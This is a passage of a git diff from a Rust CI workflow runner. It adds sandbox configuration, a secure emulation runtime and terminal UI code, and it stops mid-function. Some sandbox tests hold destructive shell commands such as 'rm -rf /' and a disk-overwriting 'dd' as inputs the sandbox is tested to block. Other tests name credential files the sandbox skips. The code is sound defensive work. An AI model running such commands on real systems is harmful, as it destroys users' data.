.filter_map(|pattern| {
|
||||
Regex::new(pattern)
|
||||
.map_err(|e| {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Invalid regex pattern {}: {}",
|
||||
pattern, e
|
||||
));
|
||||
e
|
||||
})
|
||||
.ok()
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a default sandbox configuration for CI/CD workflows
|
||||
pub fn create_workflow_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(1800), // 30 minutes
|
||||
max_memory_mb: 2048, // 2GB
|
||||
max_processes: 50,
|
||||
allow_network: true,
|
||||
strict_mode: false,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a strict sandbox configuration for untrusted code
|
||||
pub fn create_strict_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
// Very limited command set
|
||||
let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(60), // 1 minute
|
||||
max_memory_mb: 128, // 128MB
|
||||
max_processes: 5,
|
||||
allow_network: false,
|
||||
strict_mode: true,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
allowed_commands,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_dangerous_pattern_detection() {
|
||||
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
assert!(sandbox.validate_command("rm -rf /").is_err());
|
||||
assert!(sandbox
|
||||
.validate_command("dd if=/dev/zero of=/dev/sda")
|
||||
.is_err());
|
||||
assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
|
||||
assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());
|
||||
|
||||
// Should allow safe commands
|
||||
assert!(sandbox.validate_command("echo hello").is_ok());
|
||||
assert!(sandbox.validate_command("ls -la").is_ok());
|
||||
assert!(sandbox.validate_command("cargo build").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_command_whitelist() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).unwrap();
|
||||
|
||||
// Should allow whitelisted commands
|
||||
assert!(sandbox.validate_command("echo hello").is_ok());
|
||||
assert!(sandbox.validate_command("ls").is_ok());
|
||||
|
||||
// Should block non-whitelisted commands
|
||||
assert!(sandbox.validate_command("git clone").is_err());
|
||||
assert!(sandbox.validate_command("cargo build").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_file_filtering() {
|
||||
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
|
||||
|
||||
// Should skip dangerous files
|
||||
assert!(sandbox.should_skip_file("id_rsa"));
|
||||
assert!(sandbox.should_skip_file(".ssh"));
|
||||
assert!(sandbox.should_skip_file("credentials"));
|
||||
|
||||
// Should allow safe files
|
||||
assert!(!sandbox.should_skip_file("Cargo.toml"));
|
||||
assert!(!sandbox.should_skip_file("README.md"));
|
||||
assert!(!sandbox.should_skip_file(".gitignore"));
|
||||
}
|
||||
}
|
||||
339
crates/runtime/src/secure_emulation.rs
Normal file
339
crates/runtime/src/secure_emulation.rs
Normal file
@@ -0,0 +1,339 @@
|
||||
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
|
||||
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
|
||||
use async_trait::async_trait;
|
||||
use std::path::Path;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Secure emulation runtime that uses sandboxing for safety
|
||||
pub struct SecureEmulationRuntime {
|
||||
sandbox: Sandbox,
|
||||
}
|
||||
|
||||
impl Default for SecureEmulationRuntime {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SecureEmulationRuntime {
|
||||
/// Create a new secure emulation runtime with default workflow-friendly configuration
|
||||
pub fn new() -> Self {
|
||||
let config = create_workflow_sandbox_config();
|
||||
let sandbox = Sandbox::new(config).expect("Failed to create sandbox");
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");
|
||||
|
||||
Self { sandbox }
|
||||
}
|
||||
|
||||
/// Create a new secure emulation runtime with custom sandbox configuration
|
||||
pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
|
||||
let sandbox = Sandbox::new(config).map_err(|e| {
|
||||
ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
|
||||
})?;
|
||||
|
||||
wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");
|
||||
|
||||
Ok(Self { sandbox })
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ContainerRuntime for SecureEmulationRuntime {
|
||||
async fn run_container(
|
||||
&self,
|
||||
image: &str,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
_volumes: &[(&Path, &Path)],
|
||||
) -> Result<ContainerOutput, ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Executing sandboxed command: {} (image: {})",
|
||||
command.join(" "),
|
||||
image
|
||||
));
|
||||
|
||||
// Use sandbox to execute the command safely
|
||||
let result = self
|
||||
.sandbox
|
||||
.execute_command(command, env_vars, working_dir)
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(output) => {
|
||||
wrkflw_logging::info("✅ Sandboxed command completed successfully");
|
||||
Ok(output)
|
||||
}
|
||||
Err(SandboxError::BlockedCommand { command }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
|
||||
This command was blocked for security reasons. \
|
||||
If you need to run this command, please use Docker or Podman mode instead.",
|
||||
command
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::DangerousPattern { pattern }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
|
||||
This command was blocked because it matches a known dangerous pattern. \
|
||||
Please review your workflow for potentially harmful commands.",
|
||||
pattern
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ExecutionTimeout { seconds }) => {
|
||||
let error_msg = format!(
|
||||
"⏰ Command execution timed out after {} seconds. \
|
||||
Consider optimizing your command or increasing timeout limits.",
|
||||
seconds
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::PathAccessDenied { path }) => {
|
||||
let error_msg = format!(
|
||||
"🚫 Path access denied: '{}'. \
|
||||
The sandbox restricts file system access for security.",
|
||||
path
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(SandboxError::ResourceLimitExceeded { resource }) => {
|
||||
let error_msg = format!(
|
||||
"📊 Resource limit exceeded: {}. \
|
||||
Your command used too many system resources.",
|
||||
resource
|
||||
);
|
||||
wrkflw_logging::warning(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
Err(e) => {
|
||||
let error_msg = format!("Sandbox execution failed: {}", e);
|
||||
wrkflw_logging::error(&error_msg);
|
||||
Err(ContainerError::ContainerExecution(error_msg))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to pull image {}",
|
||||
image
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Secure emulation: Pretending to build image {} from {}",
|
||||
tag,
|
||||
dockerfile.display()
|
||||
));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn prepare_language_environment(
|
||||
&self,
|
||||
language: &str,
|
||||
version: Option<&str>,
|
||||
_additional_packages: Option<Vec<String>>,
|
||||
) -> Result<String, ContainerError> {
|
||||
// For secure emulation runtime, we'll use a simplified approach
|
||||
// that doesn't require building custom images
|
||||
let base_image = match language {
|
||||
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
|
||||
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
|
||||
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
|
||||
format!("eclipse-temurin:{}", v)
|
||||
}),
|
||||
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
|
||||
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
|
||||
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
|
||||
}),
|
||||
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
|
||||
_ => {
|
||||
return Err(ContainerError::ContainerStart(format!(
|
||||
"Unsupported language: {}",
|
||||
language
|
||||
)))
|
||||
}
|
||||
};
|
||||
|
||||
// For emulation, we'll just return the base image
|
||||
// The actual package installation will be handled during container execution
|
||||
Ok(base_image)
|
||||
}
|
||||
}
|
||||
|
||||
/// Handle special actions in secure emulation mode
|
||||
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
|
||||
// Extract owner, repo and version from the action
|
||||
let action_parts: Vec<&str> = action.split('@').collect();
|
||||
let action_name = action_parts[0];
|
||||
let action_version = if action_parts.len() > 1 {
|
||||
action_parts[1]
|
||||
} else {
|
||||
"latest"
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔒 Processing action in secure mode: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// In secure mode, we're more restrictive about what actions we allow
|
||||
match action_name {
|
||||
// Core GitHub actions that are generally safe
|
||||
name if name.starts_with("actions/checkout") => {
|
||||
wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
|
||||
}
|
||||
name if name.starts_with("actions/setup-node") => {
|
||||
wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
|
||||
check_command_available_secure("node", "Node.js", "https://nodejs.org/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-python") => {
|
||||
wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
|
||||
check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
|
||||
}
|
||||
name if name.starts_with("actions/setup-java") => {
|
||||
wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
|
||||
check_command_available_secure("java", "Java", "https://adoptium.net/");
|
||||
}
|
||||
name if name.starts_with("actions/cache") => {
|
||||
wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
|
||||
}
|
||||
|
||||
// Rust-specific actions
|
||||
name if name.starts_with("actions-rs/cargo") => {
|
||||
wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
|
||||
check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/toolchain") => {
|
||||
wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
|
||||
check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
|
||||
}
|
||||
name if name.starts_with("actions-rs/fmt") => {
|
||||
wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
|
||||
check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
}
|
||||
|
||||
// Potentially dangerous actions that we warn about
|
||||
name if name.contains("docker") || name.contains("container") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Docker/container action '{}' is not supported in secure emulation mode. \
|
||||
Use Docker or Podman mode for container actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
name if name.contains("ssh") || name.contains("deploy") => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
|
||||
Use Docker or Podman mode for deployment actions.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
|
||||
// Unknown actions
|
||||
_ => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🟡 Unknown action '{}' in secure emulation mode. \
|
||||
Some functionality may be limited or unavailable.",
|
||||
action_name
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Check if a command is available, with security-focused messaging
|
||||
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
|
||||
use std::process::Command;
|
||||
|
||||
let is_available = Command::new("which")
|
||||
.arg(command)
|
||||
.output()
|
||||
.map(|output| output.status.success())
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🔧 {} is required but not found on the system",
|
||||
name
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action in secure mode, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
wrkflw_logging::info(&format!(
|
||||
"Alternatively, use Docker or Podman mode for automatic {} installation",
|
||||
name
|
||||
));
|
||||
} else {
|
||||
// Try to get version information
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Using system {} in secure mode: {}",
|
||||
name,
|
||||
version.trim()
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::sandbox::create_strict_sandbox_config;
|
||||
use std::path::PathBuf;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_blocks_dangerous_commands() {
|
||||
let config = create_strict_sandbox_config();
|
||||
let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();
|
||||
|
||||
// Should block dangerous commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["rm", "-rf", "/"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_err());
|
||||
let error_msg = result.unwrap_err().to_string();
|
||||
assert!(error_msg.contains("SECURITY BLOCK"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secure_emulation_allows_safe_commands() {
|
||||
let runtime = SecureEmulationRuntime::new();
|
||||
|
||||
// Should allow safe commands
|
||||
let result = runtime
|
||||
.run_container(
|
||||
"alpine:latest",
|
||||
&["echo", "hello world"],
|
||||
&[],
|
||||
&PathBuf::from("."),
|
||||
&[],
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_ok());
|
||||
let output = result.unwrap();
|
||||
assert!(output.stdout.contains("hello world"));
|
||||
assert_eq!(output.exit_code, 0);
|
||||
}
|
||||
}
|
||||
32
crates/ui/Cargo.toml
Normal file
32
crates/ui/Cargo.toml
Normal file
@@ -0,0 +1,32 @@
|
||||
[package]
|
||||
name = "wrkflw-ui"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Terminal user interface for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
crossterm.workspace = true
|
||||
ratatui.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
tokio.workspace = true
|
||||
serde_json.workspace = true
|
||||
reqwest = { workspace = true, features = ["json"] }
|
||||
regex.workspace = true
|
||||
futures.workspace = true
|
||||
23
crates/ui/README.md
Normal file
23
crates/ui/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-ui
|
||||
|
||||
Terminal user interface for browsing workflows, running them, and viewing logs.
|
||||
|
||||
- Tabs: Workflows, Execution, Logs, Help
|
||||
- Hotkeys: `1-4`, `Tab`, `Enter`, `r`, `R`, `t`, `v`, `e`, `q`, etc.
|
||||
- Integrates with `wrkflw-executor` and `wrkflw-logging`
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use std::path::PathBuf;
|
||||
use wrkflw_executor::RuntimeType;
|
||||
use wrkflw_ui::run_wrkflw_tui;
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let path = PathBuf::from(".github/workflows");
|
||||
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Most users should run the `wrkflw` binary and select TUI mode: `wrkflw tui`.
|
||||
496
crates/ui/src/app/mod.rs
Normal file
496
crates/ui/src/app/mod.rs
Normal file
@@ -0,0 +1,496 @@
|
||||
// App module for UI state and main TUI entry point
|
||||
mod state;
|
||||
|
||||
use crate::handlers::workflow::start_next_workflow_execution;
|
||||
use crate::models::{ExecutionResultMsg, Workflow, WorkflowStatus};
|
||||
use crate::utils::load_workflows;
|
||||
use crate::views::render_ui;
|
||||
use chrono::Local;
|
||||
use crossterm::{
|
||||
event::{self, DisableMouseCapture, EnableMouseCapture, Event, KeyCode, KeyModifiers},
|
||||
execute,
|
||||
terminal::{disable_raw_mode, enable_raw_mode, EnterAlternateScreen, LeaveAlternateScreen},
|
||||
};
|
||||
use ratatui::{backend::CrosstermBackend, Terminal};
|
||||
use std::io::{self, stdout};
|
||||
use std::path::PathBuf;
|
||||
use std::sync::mpsc;
|
||||
use std::time::{Duration, Instant};
|
||||
use wrkflw_executor::RuntimeType;
|
||||
|
||||
pub use state::App;
|
||||
|
||||
// Main entry point for the TUI interface
|
||||
#[allow(clippy::ptr_arg)]
|
||||
pub async fn run_wrkflw_tui(
|
||||
path: Option<&PathBuf>,
|
||||
runtime_type: RuntimeType,
|
||||
verbose: bool,
|
||||
preserve_containers_on_failure: bool,
|
||||
) -> io::Result<()> {
|
||||
// Terminal setup
|
||||
enable_raw_mode()?;
|
||||
let mut stdout = stdout();
|
||||
execute!(stdout, EnterAlternateScreen, EnableMouseCapture)?;
|
||||
let backend = CrosstermBackend::new(stdout);
|
||||
let mut terminal = Terminal::new(backend)?;
|
||||
|
||||
// Set up channel for async communication
|
||||
let (tx, rx): (
|
||||
mpsc::Sender<ExecutionResultMsg>,
|
||||
mpsc::Receiver<ExecutionResultMsg>,
|
||||
) = mpsc::channel();
|
||||
|
||||
// Initialize app state
|
||||
let mut app = App::new(
|
||||
runtime_type.clone(),
|
||||
tx.clone(),
|
||||
preserve_containers_on_failure,
|
||||
);
|
||||
|
||||
if app.validation_mode {
|
||||
app.logs.push("Starting in validation mode".to_string());
|
||||
wrkflw_logging::info("Starting in validation mode");
|
||||
}
|
||||
|
||||
// Load workflows
|
||||
let dir_path = match path {
|
||||
Some(path) if path.is_dir() => path.clone(),
|
||||
Some(path) if path.is_file() => {
|
||||
// Single workflow file
|
||||
let name = path
|
||||
.file_name()
|
||||
.unwrap_or_default()
|
||||
.to_string_lossy()
|
||||
.into_owned();
|
||||
|
||||
app.workflows = vec![Workflow {
|
||||
name: name.clone(),
|
||||
path: path.clone(),
|
||||
selected: true,
|
||||
status: WorkflowStatus::NotStarted,
|
||||
execution_details: None,
|
||||
}];
|
||||
|
||||
// Queue the single workflow for execution
|
||||
app.execution_queue = vec![0];
|
||||
app.start_execution();
|
||||
|
||||
// Return parent dir or current dir if no parent
|
||||
path.parent()
|
||||
.map(|p| p.to_path_buf())
|
||||
.unwrap_or_else(|| PathBuf::from("."))
|
||||
}
|
||||
_ => PathBuf::from(".github/workflows"),
|
||||
};
|
||||
|
||||
// Only load directory if we haven't already loaded a single file
|
||||
if app.workflows.is_empty() {
|
||||
app.workflows = load_workflows(&dir_path);
|
||||
}
|
||||
|
||||
// Run the main event loop
|
||||
let tx_clone = tx.clone();
|
||||
|
||||
// Run the event loop
|
||||
let result = run_tui_event_loop(&mut terminal, &mut app, &tx_clone, &rx, verbose);
|
||||
|
||||
// Clean up terminal
|
||||
disable_raw_mode()?;
|
||||
execute!(
|
||||
terminal.backend_mut(),
|
||||
LeaveAlternateScreen,
|
||||
DisableMouseCapture
|
||||
)?;
|
||||
terminal.show_cursor()?;
|
||||
|
||||
match result {
|
||||
Ok(_) => Ok(()),
|
||||
Err(e) => {
|
||||
// If the TUI fails to initialize or crashes, fall back to CLI mode
|
||||
wrkflw_logging::error(&format!("Failed to start UI: {}", e));
|
||||
|
||||
// Only for 'tui' command should we fall back to CLI mode for files
|
||||
// For other commands, return the error
|
||||
if let Some(path) = path {
|
||||
if path.is_file() {
|
||||
wrkflw_logging::error("Falling back to CLI mode...");
|
||||
crate::handlers::workflow::execute_workflow_cli(path, runtime_type, verbose)
|
||||
.await
|
||||
} else if path.is_dir() {
|
||||
crate::handlers::workflow::validate_workflow(path, verbose)
|
||||
} else {
|
||||
Err(e)
|
||||
}
|
||||
} else {
|
||||
Err(e)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to run the main event loop
|
||||
fn run_tui_event_loop(
|
||||
terminal: &mut Terminal<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
tx_clone: &mpsc::Sender<ExecutionResultMsg>,
|
||||
rx: &mpsc::Receiver<ExecutionResultMsg>,
|
||||
verbose: bool,
|
||||
) -> io::Result<()> {
|
||||
// Max time to wait for events - keep this short to ensure UI responsiveness
|
||||
let event_poll_timeout = Duration::from_millis(50);
|
||||
|
||||
// Set up a dedicated tick timer
|
||||
let tick_rate = app.tick_rate;
|
||||
let mut last_tick = Instant::now();
|
||||
|
||||
loop {
|
||||
// Always redraw the UI on each loop iteration to keep it responsive
|
||||
terminal.draw(|f| {
|
||||
render_ui(f, app);
|
||||
})?;
|
||||
|
||||
// Update the UI on every tick
|
||||
if last_tick.elapsed() >= tick_rate {
|
||||
app.tick();
|
||||
app.update_running_workflow_progress();
|
||||
|
||||
// Check for log processing updates (includes system log change detection)
|
||||
app.check_log_processing_updates();
|
||||
|
||||
// Request log processing if needed
|
||||
if app.logs_need_update {
|
||||
app.request_log_processing_update();
|
||||
}
|
||||
|
||||
last_tick = Instant::now();
|
||||
}
|
||||
|
||||
// Non-blocking check for execution results
|
||||
if let Ok((workflow_idx, result)) = rx.try_recv() {
|
||||
app.process_execution_result(workflow_idx, result);
|
||||
app.current_execution = None;
|
||||
|
||||
// Get next workflow to execute using our helper function
|
||||
start_next_workflow_execution(app, tx_clone, verbose);
|
||||
}
|
||||
|
||||
// Start execution if we have a queued workflow and nothing is currently running
|
||||
if app.running && app.current_execution.is_none() && !app.execution_queue.is_empty() {
|
||||
start_next_workflow_execution(app, tx_clone, verbose);
|
||||
}
|
||||
|
||||
// Handle key events with a short timeout
|
||||
if event::poll(event_poll_timeout)? {
|
||||
if let Event::Key(key) = event::read()? {
|
||||
// Handle search input first if we're in search mode and logs tab
|
||||
if app.selected_tab == 2 && app.log_search_active {
|
||||
app.handle_log_search_input(key.code);
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle help overlay scrolling
|
||||
if app.show_help {
|
||||
match key.code {
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
app.scroll_help_up();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
app.scroll_help_down();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Esc | KeyCode::Char('?') => {
|
||||
app.show_help = false;
|
||||
continue;
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
match key.code {
|
||||
KeyCode::Char('q') => {
|
||||
// Exit and clean up
|
||||
break Ok(());
|
||||
}
|
||||
KeyCode::Esc => {
|
||||
if app.detailed_view {
|
||||
app.detailed_view = false;
|
||||
} else if app.show_help {
|
||||
app.show_help = false;
|
||||
} else {
|
||||
// Exit and clean up
|
||||
break Ok(());
|
||||
}
|
||||
}
|
||||
KeyCode::Tab => {
|
||||
// Cycle through tabs
|
||||
app.switch_tab((app.selected_tab + 1) % 4);
|
||||
}
|
||||
KeyCode::BackTab => {
|
||||
// Cycle through tabs backwards
|
||||
app.switch_tab((app.selected_tab + 3) % 4);
|
||||
}
|
||||
KeyCode::Char('1') | KeyCode::Char('w') => app.switch_tab(0),
|
||||
KeyCode::Char('2') | KeyCode::Char('x') => app.switch_tab(1),
|
||||
KeyCode::Char('3') | KeyCode::Char('l') => app.switch_tab(2),
|
||||
KeyCode::Char('4') | KeyCode::Char('h') => app.switch_tab(3),
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
if app.selected_tab == 2 {
|
||||
if !app.log_search_matches.is_empty() {
|
||||
app.previous_search_match();
|
||||
} else {
|
||||
app.scroll_logs_up();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_up();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.previous_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
if app.detailed_view {
|
||||
app.previous_step();
|
||||
} else {
|
||||
app.previous_job();
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
if app.selected_tab == 2 {
|
||||
if !app.log_search_matches.is_empty() {
|
||||
app.next_search_match();
|
||||
} else {
|
||||
app.scroll_logs_down();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_down();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.next_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
if app.detailed_view {
|
||||
app.next_step();
|
||||
} else {
|
||||
app.next_job();
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Char(' ') => {
|
||||
if app.selected_tab == 0 && !app.running {
|
||||
app.toggle_selected();
|
||||
}
|
||||
}
|
||||
KeyCode::Enter => {
|
||||
match app.selected_tab {
|
||||
0 => {
|
||||
// In workflows tab, Enter runs the selected workflow
|
||||
if !app.running {
|
||||
if let Some(idx) = app.workflow_list_state.selected() {
|
||||
app.workflows[idx].selected = true;
|
||||
app.queue_selected_for_execution();
|
||||
app.start_execution();
|
||||
}
|
||||
}
|
||||
}
|
||||
1 => {
|
||||
// In execution tab, Enter shows job details
|
||||
app.toggle_detailed_view();
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
KeyCode::Char('r') => {
|
||||
// Check if shift is pressed - this might be receiving the reset command
|
||||
if key.modifiers.contains(KeyModifiers::SHIFT) {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs.push(format!(
|
||||
"[{}] DEBUG: Shift+r detected - this should be uppercase R",
|
||||
timestamp
|
||||
));
|
||||
wrkflw_logging::info(
|
||||
"Shift+r detected as lowercase - this should be uppercase R",
|
||||
);
|
||||
|
||||
if !app.running {
|
||||
// Reset workflow status with Shift+r
|
||||
app.logs.push(format!(
|
||||
"[{}] Attempting to reset workflow status via Shift+r...",
|
||||
timestamp
|
||||
));
|
||||
app.reset_workflow_status();
|
||||
|
||||
// Force redraw to update UI immediately
|
||||
terminal.draw(|f| {
|
||||
render_ui(f, app);
|
||||
})?;
|
||||
}
|
||||
} else if !app.running {
|
||||
app.queue_selected_for_execution();
|
||||
app.start_execution();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('a') => {
|
||||
if !app.running {
|
||||
// Select all workflows
|
||||
for workflow in &mut app.workflows {
|
||||
workflow.selected = true;
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Char('e') => {
|
||||
if !app.running {
|
||||
app.toggle_emulation_mode();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('v') => {
|
||||
if !app.running {
|
||||
app.toggle_validation_mode();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('n') => {
|
||||
if app.selected_tab == 2 && !app.log_search_query.is_empty() {
|
||||
app.next_search_match();
|
||||
} else if app.selected_tab == 0 && !app.running {
|
||||
// Deselect all workflows
|
||||
for workflow in &mut app.workflows {
|
||||
workflow.selected = false;
|
||||
}
|
||||
}
|
||||
}
|
||||
KeyCode::Char('R') => {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs.push(format!(
|
||||
"[{}] DEBUG: Reset key 'Shift+R' pressed",
|
||||
timestamp
|
||||
));
|
||||
wrkflw_logging::info("Reset key 'Shift+R' pressed");
|
||||
|
||||
if !app.running {
|
||||
// Reset workflow status
|
||||
app.logs.push(format!(
